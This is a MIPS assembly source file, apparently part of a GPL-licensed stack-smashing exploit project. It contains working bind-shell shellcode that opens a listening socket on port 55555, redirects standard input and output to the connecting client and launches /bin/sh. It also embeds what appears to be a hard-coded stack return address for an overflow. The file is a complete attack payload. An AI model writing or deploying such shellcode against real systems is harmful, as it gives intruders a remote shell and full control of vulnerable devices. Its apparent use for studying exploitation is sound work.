/*
 * Copyright (C) 2009 Jeffrey Knockel
 * 
 * This file is a part of MIPS StackSmash.
 * 
 * MIPS StackSmash is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * MIPS StackSmash is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with MIPS StackSmash.  If not, see <http://www.gnu.org/licenses/>.
 */

#include <sys/regdef.h>
#include <sys/syscall.h>

/*
struct sockaddr_in {
    unsigned short int sin_family;  // 2 bytes
    unsigned short sin_port;        // 2 bytes
    struct in_addr sin_addr;        // 4 bytes
    unsigned char padding[8];       // 8 bytes
};

struct sin_addr {
    unsigned int s_addr;            // 4 bytes
};

*/

#define AF_INET 2
#define INADDR_ANY 0
#define PF_INET 2
#define SOCK_STREAM 2

#define PORT 0xd903 // 55555
#define BACKLOG 1

#define AF_INET_PORT 0x2d903
    
.text
    .globl main
main:
    .set noreorder
    nop
    addiu   sp, sp, -256
    li      t0, AF_INET_PORT
    li      t1, 16
    sw      t0, 0(sp)
    sw      zero, 4(sp)
    sw      zero, 8(sp)
    sw      zero, 12(sp)
    sw      t1, 16(sp)
    
    li      a0, PF_INET
    li      a1, SOCK_STREAM
    move    a2, zero
    li      v0, SYS_socket
    syscall

    move    a0, v0
    move    a1, sp
    li      a2, 16
    li      v0, SYS_bind
    syscall

    b       8
    li      a1, BACKLOG
    .word   0x7fff778c
    li      v0, SYS_listen
    syscall

    move    a1, sp
    addiu   a2, sp, 16
    li      v0, SYS_accept
    syscall

    move    a0, v0
    li      a1, 0
    li      v0, SYS_dup2
    syscall

    li      a1, 1
    li      v0, SYS_dup2
    syscall

    li      a1, 2
    li      v0, SYS_dup2
    syscall

    li      t0, 0x2f62696e // "/bin"
    li      t1, 0x2f736800 // "/sh\0"
    sw      t0, 0(sp)
    sw      t1, 4(sp)
    move    a0, sp
    addiu   a1, sp, 8
    addiu   a2, sp, 8
    li      v0, SYS_execve
    syscall
    .set reorder
